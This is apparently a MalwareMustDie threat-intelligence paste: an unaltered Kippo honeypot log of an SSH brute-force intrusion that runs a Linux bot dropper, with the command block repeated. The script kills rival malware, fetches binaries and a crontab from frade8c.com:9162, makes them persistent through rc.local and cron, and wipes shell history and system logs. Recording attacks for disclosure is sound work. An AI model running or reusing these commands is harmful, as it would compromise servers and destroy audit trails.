MalwareMustDie

.IptabLes|x comeback frade8c.com:9162

Oct 13th, 2014
  1. #MalwareMustDie | Case: http://blog.malwaremustdie.org/2014/05/linux-reversing-is-fun-toying-with-elf.html
  2. #Follow-up report: the campaign is still active in the wild
  3. warning: the log below contains live URLs
  4.  
  5. #Reported log (honeypot capture, unaltered):
  6.  
  7. 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] login attempt [root/password] succeeded
  8. 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] root authenticated with keyboard-interactive
  9. 2014-10-13 10:33:31-0400 [SSHService ssh-userauth on HoneyPotTransport,550,61.174.50.134] starting service ssh-connection
  10. 2014-10-13 10:33:31-0400 [SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] got channel session request
  11. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] channel open
  12. 2014-10-13 10:33:31-0400 [kippo.core.ssh.HoneyPotSSHFactory] New connection: 61.174.50.134:40011 (x.x.x.x) [session: 551]
  13. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] executing command "/etc/init.d/iptables stop
  14.     echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  15.     echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  16.     apt-get -y install wget
  17.     yum -y install wget
  18.     chmod 7777 / etc
  19.     killall -9 .IptabLes
  20.     killall -9 nfsd4
  21.     killall -9 profild.key
  22.     cd /etc;rm -rf dir fake.cfg
  23.     killall -9 nfsd
  24.     killall -9 DDosl
  25.     killall -9 lengchao32
  26.     killall -9 b26
  27.     killall -9 khelper
  28.     killall -9 Bill
  29.     killall -9 n26
  30.     killall -9 007
  31.     killall -9 codelove
  32.     killall -9 32
  33.     killall -9 m32
  34.     killall -9 m64
  35.     killall -9 64
  36.     killall -9 83BOT
  37.     killall -9 82BOT
  38.     killall -9 dos64
  39.     killall -9 dos32
  40.     killall -9 new6
  41.     killall -9 new4
  42.     killall -9 node24
  43.     killall -9 mimi
  44.     killall -9 nodeJR-1
  45.     killall -9 freeBSD
  46.     killall -9 ksapdd
  47.     killall -9 106
  48.     killall -9 09
  49.     killall -9 xsw
  50.     killall -9 syslogd
  51.     killall -9 skysapdd
  52.     killall -9 cupsddd
  53.     killall -9 ksapd
  54.     killall -9 atddd
  55.     killall -9 xfsdxd
  56.     killall -9 sfewfesfs
  57.     killall -9 gfhjrtfyhuf
  58.     killall -9 rewgtf3er4t
  59.     killall -9 fdsfsfvff
  60.     killall -9 smarvtd
  61.     killall -9 whitptabil
  62.     killall -9 gdmorpen
  63.     cd /etc;chattr -i 66
  64.     cd /root; chmod 7777 / etc
  65.     killall -9 minerd
  66.     killall -9 syn
  67.     killall -9 joudckfr
  68.     killall -9 www
  69.     killall -9 log
  70.     killall -9 .IptabLes
  71.     killall -9 .IptabLex
  72.     killall -9 .Mm2
  73.     killall -9 acpid
  74.     killall -9 m64
  75.     killall -9 ./QQ
  76.     killall -9 aabb
  77.     killall -9 g3
  78.     killall -9 S99local
  79.     killall -9 3
  80.     killall -9 pm
  81.     killall -9 qweasd
  82.     killall -9 tangtang
  83.     killall -9 imap-login
  84.     killall -9 xudp
  85.     killall -9 sshpa
  86.     killall -9 008
  87.     killall -9 txma
  88.     killall -9 mrdos64.b00
  89.     killall -9 mrdos32.b00
  90.     killall -9 kkpklp
  91.     killall -9 kiilp
  92.     killall -9 xin1
  93.     killall -9 jibateng
  94.     killall -9 syscore.sh
  95.     killall -9 syscore.sh
  96.     killall -9 syscore.sh
  97.     killall -9 .mimeo
  98.     killall -9 .mimeo
  99.     killall -9 .mimeo
  100.     killall -9 .mimeop
  101.     killall -9 .task1
  102.     killall -9 .mimeop
  103.     killall -9 .IptabLes
  104.     killall -9 .IptabLex
  105.     killall -9 .IptabLes
  106.     killall -9 .IptabLex
  107.     killall -9 .IptabLes
  108.     killall -9 .IptabLex
  109.     killall -9 .IptabLes
  110.     killall -9 .IptabLex
  111.     cd /root;rm -rf dir nohup.out
  112.     cd /etc;rm -rf dir fake.cfg
  113.     cd /etc;rm -rf dir cupsddd.*
  114.     cd /etc;rm -rf dir atddd.*
  115.     cd /etc;rm -rf dir ksapdd.*
  116.     cd /etc;rm -rf dir kysapdd.*
  117.     cd /etc;rm -rf dir sksapdd.*
  118.     cd /etc;rm -rf dir skysapdd.*
  119.     cd /etc;rm -rf dir xfsdxd.*
  120.     cd /etc;rm -rf dir fake.cfg
  121.     cd /etc;rm -rf dir cupsdd.*
  122.     cd /etc;rm -rf dir atdd.*
  123.     cd /etc;rm -rf dir ksapd.*
  124.     cd /etc;rm -rf dir kysapd.*
  125.     cd /etc;rm -rf dir sksapd.*
  126.     cd /etc;rm -rf dir skysapd.*
  127.     cd /etc;rm -rf dir xfsdx.*
  128.     cd /etc;rm -rf dir sfewfesfs
  129.     cd /etc;rm -rf dir gfhjrtfyhuf
  130.     cd /etc;rm -rf dir rewgtf3er4t
  131.     cd /etc;rm -rf dir fdsfsfvff
  132.     cd /etc;rm -rf dir smarvtd
  133.     cd /etc;rm -rf dir whitptabil
  134.     cd /etc;rm -rf dir gdmorpen
  135.     cd /etc;rm -rf dir sfewfesfs.*
  136.     cd /etc;rm -rf dir gfhjrtfyhuf.*
  137.     cd /etc;rm -rf dir rewgtf3er4t.*
  138.     cd /etc;rm -rf dir fdsfsfvff.*
  139.     cd /etc;rm -rf dir smarvtd.*
  140.     cd /etc;rm -rf dir whitptabil.*
  141.     cd /etc;rm -rf dir gdmorpen.*
  142.     cd /etc;rm -rf dir nhgbhhj.*
  143.     cd /tmp;rm -rf dir 1.*
  144.     cd /tmp;rm -rf dir 2.*
  145.     cd /tmp;rm -rf dir 3.*
  146.     cd /tmp;rm -rf dir 4.*
  147.     cd /tmp;rm -rf dir 5.*
  148.     cd /tmp;rm -rf dir jdhe
  149.     cd /tmp;rm -rf dir jdhe.*
  150.     cd /var/spool/cron; rm -rf dir root.*
  151.     cd /var/spool/cron; rm -rf dir root
  152.     cd /var/spool/cron/crontabs; rm -rf dir root.*
  153.     cd /var/spool/cron/crontabs; rm -rf dir root
  154.     cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  155.     cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  156.     yes|mv /tmp/root /var/spool/cron
  157.     yes|mv /tmp/root /var/spool/cron/crontabs
  158.     cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  159.     cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  160.     cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  161.     cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  162.     cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  163.     cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  164.     cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  165.     cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  166.     cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  167.     cd /etc;wget -c http://www.frade8c.com:9162/byv832
  168.     cd /tmp;chmod 7777 jdhe
  169.     cd /etc;chmod 7777 nhgbhhj
  170.     cd /etc;chmod 7777 byv832
  171.     cd /etc;chmod 7777 sfewfesfs
  172.     cd /etc;chmod 7777 gfhjrtfyhuf
  173.     cd /etc;chmod 7777 rewgtf3er4t
  174.     cd /etc;chmod 7777 fdsfsfvff
  175.     cd /etc;chmod 7777 smarvtd
  176.     cd /etc;chmod 7777 whitptabil
  177.     cd /etc;chmod 7777 gdmorpen
  178.     cd /tmp;chmod 7777 nhgbhhj
  179.     cd /tmp;chmod 7777 byv832
  180.     cd /tmp;chmod 7777 sfewfesfs
  181.     cd /tmp;chmod 7777 gfhjrtfyhuf
  182.     cd /tmp;chmod 7777 rewgtf3er4t
  183.     cd /tmp;chmod 7777 fdsfsfvff
  184.     cd /tmp;chmod 7777 smarvtd
  185.     cd /tmp;chmod 7777 whitptabil
  186.     cd /tmp;chmod 7777 gdmorpen
  187.     cd /tmp;./jdhe
  188.     nohup /etc/sfewfesfs > /dev/null 2>&1&
  189.     nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  190.     nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  191.     nohup /etc/fdsfsfvff > /dev/null 2>&1&
  192.     nohup /etc/smarvtd > /dev/null 2>&1&
  193.     nohup /etc/whitptabil > /dev/null 2>&1&
  194.     nohup /etc/gdmorpen > /dev/null 2>&1&
  195.     nohup /etc/nhgbhhj > /dev/null 2>&1&
  196.     nohup /etc/byv832 > /dev/null 2>&1&
  197.     nohup /tmp/sfewfesfs > /dev/null 2>&1&
  198.     nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  199.     nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  200.     nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  201.     nohup /tmp/smarvtd > /dev/null 2>&1&
  202.     nohup /tmp/whitptabil > /dev/null 2>&1&
  203.     nohup /tmp/gdmorpen > /dev/null 2>&1&
  204.     nohup /tmp/nhgbhhj > /dev/null 2>&1&
  205.     nohup /tmp/byv832 > /dev/null 2>&1&
  206.     echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  207.     echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  208.     echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  209.     echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  210.     echo "cd /tmp;./smarvtd" >> /etc/rc.local
  211.     echo "cd /tmp;./whitptabil" >> /etc/rc.local
  212.     echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  213.     echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  214.     echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  215.     echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  216.     echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  217.     echo "cd /etc;./smarvtd" >> /etc/rc.local
  218.     echo "cd /etc;./whitptabil" >> /etc/rc.local
  219.     echo "cd /etc;./gdmorpen" >> /etc/rc.local
  220.     echo "unset MAILCHECK" >> /etc/profile
  221.     cd /etc;chattr +i sfewfesfs
  222.     rm -rf /root/.bash_history
  223.     touch /root/.bash_history
  224.     history -r
  225.     cd /var/log > dmesg
  226.     cd /var/log > auth.log
  227.     cd /var/log > alternatives.log
  228.     cd /var/log > boot.log
  229.     cd /var/log > btmp
  230.     cd /var/log > cron
  231.     cd /var/log > cups
  232.     cd /var/log > daemon.log
  233.     cd /var/log > dpkg.log
  234.     cd /var/log > faillog
  235.     cd /var/log > kern.log
  236.     cd /var/log > lastlog
  237.     cd /var/log > maillog
  238.     cd /var/log > user.log
  239.     cd /var/log > Xorg.x.log
  240.     cd /var/log > anaconda.log
  241.     cd /var/log > yum.log
  242.     cd /var/log > secure
  243.     cd /var/log > wtmp
  244.     cd /var/log > utmp
  245.     cd /var/log > messages
  246.     cd /var/log > spooler
  247.     cd /var/log > sudolog
  248.     cd /var/log > aculog
  249.     cd /var/log > access-log
  250.     cd /root > .bash_history
  251.     history -c"
  252. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] exec command: "/etc/init.d/iptables stop
  253.     echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  254.     echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  255.     apt-get -y install wget
  256.     yum -y install wget
  257.     chmod 7777 / etc
  258.     killall -9 .IptabLes
  259.     killall -9 nfsd4
  260.     killall -9 profild.key
  261.     cd /etc;rm -rf dir fake.cfg
  262.     killall -9 nfsd
  263.     killall -9 DDosl
  264.     killall -9 lengchao32
  265.     killall -9 b26
  266.     killall -9 khelper
  267.     killall -9 Bill
  268.     killall -9 n26
  269.     killall -9 007
  270.     killall -9 codelove
  271.     killall -9 32
  272.     killall -9 m32
  273.     killall -9 m64
  274.     killall -9 64
  275.     killall -9 83BOT
  276.     killall -9 82BOT
  277.     killall -9 dos64
  278.     killall -9 dos32
  279.     killall -9 new6
  280.     killall -9 new4
  281.     killall -9 node24
  282.     killall -9 mimi
  283.     killall -9 nodeJR-1
  284.     killall -9 freeBSD
  285.     killall -9 ksapdd
  286.     killall -9 106
  287.     killall -9 09
  288.     killall -9 xsw
  289.     killall -9 syslogd
  290.     killall -9 skysapdd
  291.     killall -9 cupsddd
  292.     killall -9 ksapd
  293.     killall -9 atddd
  294.     killall -9 xfsdxd
  295.     killall -9 sfewfesfs
  296.     killall -9 gfhjrtfyhuf
  297.     killall -9 rewgtf3er4t
  298.     killall -9 fdsfsfvff
  299.     killall -9 smarvtd
  300.     killall -9 whitptabil
  301.     killall -9 gdmorpen
  302.     cd /etc;chattr -i 66
  303.     cd /root; chmod 7777 / etc
  304.     killall -9 minerd
  305.     killall -9 syn
  306.     killall -9 joudckfr
  307.     killall -9 www
  308.     killall -9 log
  309.     killall -9 .IptabLes
  310.     killall -9 .IptabLex
  311.     killall -9 .Mm2
  312.     killall -9 acpid
  313.     killall -9 m64
  314.     killall -9 ./QQ
  315.     killall -9 aabb
  316.     killall -9 g3
  317.     killall -9 S99local
  318.     killall -9 3
  319.     killall -9 pm
  320.     killall -9 qweasd
  321.     killall -9 tangtang
  322.     killall -9 imap-login
  323.     killall -9 xudp
  324.     killall -9 sshpa
  325.     killall -9 008
  326.     killall -9 txma
  327.     killall -9 mrdos64.b00
  328.     killall -9 mrdos32.b00
  329.     killall -9 kkpklp
  330.     killall -9 kiilp
  331.     killall -9 xin1
  332.     killall -9 jibateng
  333.     killall -9 syscore.sh
  334.     killall -9 syscore.sh
  335.     killall -9 syscore.sh
  336.     killall -9 .mimeo
  337.     killall -9 .mimeo
  338.     killall -9 .mimeo
  339.     killall -9 .mimeop
  340.     killall -9 .task1
  341.     killall -9 .mimeop
  342.     killall -9 .IptabLes
  343.     killall -9 .IptabLex
  344.     killall -9 .IptabLes
  345.     killall -9 .IptabLex
  346.     killall -9 .IptabLes
  347.     killall -9 .IptabLex
  348.     killall -9 .IptabLes
  349.     killall -9 .IptabLex
  350.     cd /root;rm -rf dir nohup.out
  351.     cd /etc;rm -rf dir fake.cfg
  352.     cd /etc;rm -rf dir cupsddd.*
  353.     cd /etc;rm -rf dir atddd.*
  354.     cd /etc;rm -rf dir ksapdd.*
  355.     cd /etc;rm -rf dir kysapdd.*
  356.     cd /etc;rm -rf dir sksapdd.*
  357.     cd /etc;rm -rf dir skysapdd.*
  358.     cd /etc;rm -rf dir xfsdxd.*
  359.     cd /etc;rm -rf dir fake.cfg
  360.     cd /etc;rm -rf dir cupsdd.*
  361.     cd /etc;rm -rf dir atdd.*
  362.     cd /etc;rm -rf dir ksapd.*
  363.     cd /etc;rm -rf dir kysapd.*
  364.     cd /etc;rm -rf dir sksapd.*
  365.     cd /etc;rm -rf dir skysapd.*
  366.     cd /etc;rm -rf dir xfsdx.*
  367.     cd /etc;rm -rf dir sfewfesfs
  368.     cd /etc;rm -rf dir gfhjrtfyhuf
  369.     cd /etc;rm -rf dir rewgtf3er4t
  370.     cd /etc;rm -rf dir fdsfsfvff
  371.     cd /etc;rm -rf dir smarvtd
  372.     cd /etc;rm -rf dir whitptabil
  373.     cd /etc;rm -rf dir gdmorpen
  374.     cd /etc;rm -rf dir sfewfesfs.*
  375.     cd /etc;rm -rf dir gfhjrtfyhuf.*
  376.     cd /etc;rm -rf dir rewgtf3er4t.*
  377.     cd /etc;rm -rf dir fdsfsfvff.*
  378.     cd /etc;rm -rf dir smarvtd.*
  379.     cd /etc;rm -rf dir whitptabil.*
  380.     cd /etc;rm -rf dir gdmorpen.*
  381.     cd /etc;rm -rf dir nhgbhhj.*
  382.     cd /tmp;rm -rf dir 1.*
  383.     cd /tmp;rm -rf dir 2.*
  384.     cd /tmp;rm -rf dir 3.*
  385.     cd /tmp;rm -rf dir 4.*
  386.     cd /tmp;rm -rf dir 5.*
  387.     cd /tmp;rm -rf dir jdhe
  388.     cd /tmp;rm -rf dir jdhe.*
  389.     cd /var/spool/cron; rm -rf dir root.*
  390.     cd /var/spool/cron; rm -rf dir root
  391.     cd /var/spool/cron/crontabs; rm -rf dir root.*
  392.     cd /var/spool/cron/crontabs; rm -rf dir root
  393.     cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  394.     cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  395.     yes|mv /tmp/root /var/spool/cron
  396.     yes|mv /tmp/root /var/spool/cron/crontabs
  397.     cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  398.     cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  399.     cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  400.     cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  401.     cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  402.     cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  403.     cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  404.     cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  405.     cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  406.     cd /etc;wget -c http://www.frade8c.com:9162/byv832
  407.     cd /tmp;chmod 7777 jdhe
  408.     cd /etc;chmod 7777 nhgbhhj
  409.     cd /etc;chmod 7777 byv832
  410.     cd /etc;chmod 7777 sfewfesfs
  411.     cd /etc;chmod 7777 gfhjrtfyhuf
  412.     cd /etc;chmod 7777 rewgtf3er4t
  413.     cd /etc;chmod 7777 fdsfsfvff
  414.     cd /etc;chmod 7777 smarvtd
  415.     cd /etc;chmod 7777 whitptabil
  416.     cd /etc;chmod 7777 gdmorpen
  417.     cd /tmp;chmod 7777 nhgbhhj
  418.     cd /tmp;chmod 7777 byv832
  419.     cd /tmp;chmod 7777 sfewfesfs
  420.     cd /tmp;chmod 7777 gfhjrtfyhuf
  421.     cd /tmp;chmod 7777 rewgtf3er4t
  422.     cd /tmp;chmod 7777 fdsfsfvff
  423.     cd /tmp;chmod 7777 smarvtd
  424.     cd /tmp;chmod 7777 whitptabil
  425.     cd /tmp;chmod 7777 gdmorpen
  426.     cd /tmp;./jdhe
  427.     nohup /etc/sfewfesfs > /dev/null 2>&1&
  428.     nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  429.     nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  430.     nohup /etc/fdsfsfvff > /dev/null 2>&1&
  431.     nohup /etc/smarvtd > /dev/null 2>&1&
  432.     nohup /etc/whitptabil > /dev/null 2>&1&
  433.     nohup /etc/gdmorpen > /dev/null 2>&1&
  434.     nohup /etc/nhgbhhj > /dev/null 2>&1&
  435.     nohup /etc/byv832 > /dev/null 2>&1&
  436.     nohup /tmp/sfewfesfs > /dev/null 2>&1&
  437.     nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  438.     nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  439.     nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  440.     nohup /tmp/smarvtd > /dev/null 2>&1&
  441.     nohup /tmp/whitptabil > /dev/null 2>&1&
  442.     nohup /tmp/gdmorpen > /dev/null 2>&1&
  443.     nohup /tmp/nhgbhhj > /dev/null 2>&1&
  444.     nohup /tmp/byv832 > /dev/null 2>&1&
  445.     echo "cd /tmp;./sfewfesfs" >> /etc/rc.local
  446.     echo "cd /tmp;./gfhjrtfyhuf" >> /etc/rc.local
  447.     echo "cd /tmp;./rewgtf3er4t" >> /etc/rc.local
  448.     echo "cd /tmp;./fdsfsfvff" >> /etc/rc.local
  449.     echo "cd /tmp;./smarvtd" >> /etc/rc.local
  450.     echo "cd /tmp;./whitptabil" >> /etc/rc.local
  451.     echo "cd /tmp;./gdmorpen" >> /etc/rc.local
  452.     echo "cd /etc;./sfewfesfs" >> /etc/rc.local
  453.     echo "cd /etc;./gfhjrtfyhuf" >> /etc/rc.local
  454.     echo "cd /etc;./rewgtf3er4t" >> /etc/rc.local
  455.     echo "cd /etc;./fdsfsfvff" >> /etc/rc.local
  456.     echo "cd /etc;./smarvtd" >> /etc/rc.local
  457.     echo "cd /etc;./whitptabil" >> /etc/rc.local
  458.     echo "cd /etc;./gdmorpen" >> /etc/rc.local
  459.     echo "unset MAILCHECK" >> /etc/profile
  460.     cd /etc;chattr +i sfewfesfs
  461.     rm -rf /root/.bash_history
  462.     touch /root/.bash_history
  463.     history -r
  464.     cd /var/log > dmesg
  465.     cd /var/log > auth.log
  466.     cd /var/log > alternatives.log
  467.     cd /var/log > boot.log
  468.     cd /var/log > btmp
  469.     cd /var/log > cron
  470.     cd /var/log > cups
  471.     cd /var/log > daemon.log
  472.     cd /var/log > dpkg.log
  473.     cd /var/log > faillog
  474.     cd /var/log > kern.log
  475.     cd /var/log > lastlog
  476.     cd /var/log > maillog
  477.     cd /var/log > user.log
  478.     cd /var/log > Xorg.x.log
  479.     cd /var/log > anaconda.log
  480.     cd /var/log > yum.log
  481.     cd /var/log > secure
  482.     cd /var/log > wtmp
  483.     cd /var/log > utmp
  484.     cd /var/log > messages
  485.     cd /var/log > spooler
  486.     cd /var/log > sudolog
  487.     cd /var/log > aculog
  488.     cd /var/log > access-log
  489.     cd /root > .bash_history
  490.     history -c"
  491. 2014-10-13 10:33:31-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Opening TTY log: log/tty/20141013-103331-7357.log
  492. 2014-10-13 10:33:33-0400 [SSHChannel session (0) on SSHService ssh-connection on HoneyPotTransport,550,61.174.50.134] Running exec command "/etc/init.d/iptables stop
  493.     echo "nameserver 8.8.8.8" >> /etc/resolv.conf
  494.     echo "nameserver 8.8.4.4" >> /etc/resolv.conf
  495.     apt-get -y install wget
  496.     yum -y install wget
  497.     chmod 7777 / etc
  498.     killall -9 .IptabLes
  499.     killall -9 nfsd4
  500.     killall -9 profild.key
  501.     cd /etc;rm -rf dir fake.cfg
  502.     killall -9 nfsd
  503.     killall -9 DDosl
  504.     killall -9 lengchao32
  505.     killall -9 b26
  506.     killall -9 khelper
  507.     killall -9 Bill
  508.     killall -9 n26
  509.     killall -9 007
  510.     killall -9 codelove
  511.     killall -9 32
  512.     killall -9 m32
  513.     killall -9 m64
  514.     killall -9 64
  515.     killall -9 83BOT
  516.     killall -9 82BOT
  517.     killall -9 dos64
  518.     killall -9 dos32
  519.     killall -9 new6
  520.     killall -9 new4
  521.     killall -9 node24
  522.     killall -9 mimi
  523.     killall -9 nodeJR-1
  524.     killall -9 freeBSD
  525.     killall -9 ksapdd
  526.     killall -9 106
  527.     killall -9 09
  528.     killall -9 xsw
  529.     killall -9 syslogd
  530.     killall -9 skysapdd
  531.     killall -9 cupsddd
  532.     killall -9 ksapd
  533.     killall -9 atddd
  534.     killall -9 xfsdxd
  535.     killall -9 sfewfesfs
  536.     killall -9 gfhjrtfyhuf
  537.     killall -9 rewgtf3er4t
  538.     killall -9 fdsfsfvff
  539.     killall -9 smarvtd
  540.     killall -9 whitptabil
  541.     killall -9 gdmorpen
  542.     cd /etc;chattr -i 66
  543.     cd /root; chmod 7777 / etc
  544.     killall -9 minerd
  545.     killall -9 syn
  546.     killall -9 joudckfr
  547.     killall -9 www
  548.     killall -9 log
  549.     killall -9 .IptabLes
  550.     killall -9 .IptabLex
  551.     killall -9 .Mm2
  552.     killall -9 acpid
  553.     killall -9 m64
  554.     killall -9 ./QQ
  555.     killall -9 aabb
  556.     killall -9 g3
  557.     killall -9 S99local
  558.     killall -9 3
  559.     killall -9 pm
  560.     killall -9 qweasd
  561.     killall -9 tangtang
  562.     killall -9 imap-login
  563.     killall -9 xudp
  564.     killall -9 sshpa
  565.     killall -9 008
  566.     killall -9 txma
  567.     killall -9 mrdos64.b00
  568.     killall -9 mrdos32.b00
  569.     killall -9 kkpklp
  570.     killall -9 kiilp
  571.     killall -9 xin1
  572.     killall -9 jibateng
  573.     killall -9 syscore.sh
  574.     killall -9 syscore.sh
  575.     killall -9 syscore.sh
  576.     killall -9 .mimeo
  577.     killall -9 .mimeo
  578.     killall -9 .mimeo
  579.     killall -9 .mimeop
  580.     killall -9 .task1
  581.     killall -9 .mimeop
  582.     killall -9 .IptabLes
  583.     killall -9 .IptabLex
  584.     killall -9 .IptabLes
  585.     killall -9 .IptabLex
  586.     killall -9 .IptabLes
  587.     killall -9 .IptabLex
  588.     killall -9 .IptabLes
  589.     killall -9 .IptabLex
  590.     cd /root;rm -rf dir nohup.out
  591.     cd /etc;rm -rf dir fake.cfg
  592.     cd /etc;rm -rf dir cupsddd.*
  593.     cd /etc;rm -rf dir atddd.*
  594.     cd /etc;rm -rf dir ksapdd.*
  595.     cd /etc;rm -rf dir kysapdd.*
  596.     cd /etc;rm -rf dir sksapdd.*
  597.     cd /etc;rm -rf dir skysapdd.*
  598.     cd /etc;rm -rf dir xfsdxd.*
  599.     cd /etc;rm -rf dir fake.cfg
  600.     cd /etc;rm -rf dir cupsdd.*
  601.     cd /etc;rm -rf dir atdd.*
  602.     cd /etc;rm -rf dir ksapd.*
  603.     cd /etc;rm -rf dir kysapd.*
  604.     cd /etc;rm -rf dir sksapd.*
  605.     cd /etc;rm -rf dir skysapd.*
  606.     cd /etc;rm -rf dir xfsdx.*
  607.     cd /etc;rm -rf dir sfewfesfs
  608.     cd /etc;rm -rf dir gfhjrtfyhuf
  609.     cd /etc;rm -rf dir rewgtf3er4t
  610.     cd /etc;rm -rf dir fdsfsfvff
  611.     cd /etc;rm -rf dir smarvtd
  612.     cd /etc;rm -rf dir whitptabil
  613.     cd /etc;rm -rf dir gdmorpen
  614.     cd /etc;rm -rf dir sfewfesfs.*
  615.     cd /etc;rm -rf dir gfhjrtfyhuf.*
  616.     cd /etc;rm -rf dir rewgtf3er4t.*
  617.     cd /etc;rm -rf dir fdsfsfvff.*
  618.     cd /etc;rm -rf dir smarvtd.*
  619.     cd /etc;rm -rf dir whitptabil.*
  620.     cd /etc;rm -rf dir gdmorpen.*
  621.     cd /etc;rm -rf dir nhgbhhj.*
  622.     cd /tmp;rm -rf dir 1.*
  623.     cd /tmp;rm -rf dir 2.*
  624.     cd /tmp;rm -rf dir 3.*
  625.     cd /tmp;rm -rf dir 4.*
  626.     cd /tmp;rm -rf dir 5.*
  627.     cd /tmp;rm -rf dir jdhe
  628.     cd /tmp;rm -rf dir jdhe.*
  629.     cd /var/spool/cron; rm -rf dir root.*
  630.     cd /var/spool/cron; rm -rf dir root
  631.     cd /var/spool/cron/crontabs; rm -rf dir root.*
  632.     cd /var/spool/cron/crontabs; rm -rf dir root
  633.     cd /var/spool/cron ;wget -c http://www.frade8c.com:9162/root
  634.     cd /var/spool/cron/crontabs ;wget -c http://www.frade8c.com:9162/root
  635.     yes|mv /tmp/root /var/spool/cron
  636.     yes|mv /tmp/root /var/spool/cron/crontabs
  637.     cd /tmp;wget -c http://www.frade8c.com:9162/jdhe
  638.     cd /etc;wget -c http://www.frade8c.com:9162/sfewfesfs
  639.     cd /etc;wget -c http://www.frade8c.com:9162/gfhjrtfyhuf
  640.     cd /etc;wget -c http://www.frade8c.com:9162/rewgtf3er4t
  641.     cd /etc;wget -c http://www.frade8c.com:9162/fdsfsfvff
  642.     cd /etc;wget -c http://www.frade8c.com:9162/smarvtd
  643.     cd /etc;wget -c http://www.frade8c.com:9162/whitptabil
  644.     cd /etc;wget -c http://www.frade8c.com:9162/gdmorpen
  645.     cd /etc;wget -c http://www.frade8c.com:9162/nhgbhhj
  646.     cd /etc;wget -c http://www.frade8c.com:9162/byv832
  647.     cd /tmp;chmod 7777 jdhe
  648.     cd /etc;chmod 7777 nhgbhhj
  649.     cd /etc;chmod 7777 byv832
  650.     cd /etc;chmod 7777 sfewfesfs
  651.     cd /etc;chmod 7777 gfhjrtfyhuf
  652.     cd /etc;chmod 7777 rewgtf3er4t
  653.     cd /etc;chmod 7777 fdsfsfvff
  654.     cd /etc;chmod 7777 smarvtd
  655.     cd /etc;chmod 7777 whitptabil
  656.     cd /etc;chmod 7777 gdmorpen
  657.     cd /tmp;chmod 7777 nhgbhhj
  658.     cd /tmp;chmod 7777 byv832
  659.     cd /tmp;chmod 7777 sfewfesfs
  660.     cd /tmp;chmod 7777 gfhjrtfyhuf
  661.     cd /tmp;chmod 7777 rewgtf3er4t
  662.     cd /tmp;chmod 7777 fdsfsfvff
  663.     cd /tmp;chmod 7777 smarvtd
  664.     cd /tmp;chmod 7777 whitptabil
  665.     cd /tmp;chmod 7777 gdmorpen
  666.     cd /tmp;./jdhe
  667.     nohup /etc/sfewfesfs > /dev/null 2>&1&
  668.     nohup /etc/gfhjrtfyhuf > /dev/null 2>&1&
  669.     nohup /etc/rewgtf3er4t > /dev/null 2>&1&
  670.     nohup /etc/fdsfsfvff > /dev/null 2>&1&
  671.     nohup /etc/smarvtd > /dev/null 2>&1&
  672.     nohup /etc/whitptabil > /dev/null 2>&1&
  673.     nohup /etc/gdmorpen > /dev/null 2>&1&
  674.     nohup /etc/nhgbhhj > /dev/null 2>&1&
  675.     nohup /etc/byv832 > /dev/null 2>&1&
  676.     nohup /tmp/sfewfesfs > /dev/null 2>&1&
  677.     nohup /tmp/gfhjrtfyhuf > /dev/null 2>&1&
  678.     nohup /tmp/rewgtf3er4t > /dev/null 2>&1&
  679.     nohup /tmp/fdsfsfvff > /dev/null 2>&1&
  680.     nohup /tmp/smarvtd > /dev/null 2>&1&
  681.     nohup /tmp/whitptabil > /dev/null 2>&1&
  682.     nohup /tmp/gdmorpen > /dev/null 2>&1&
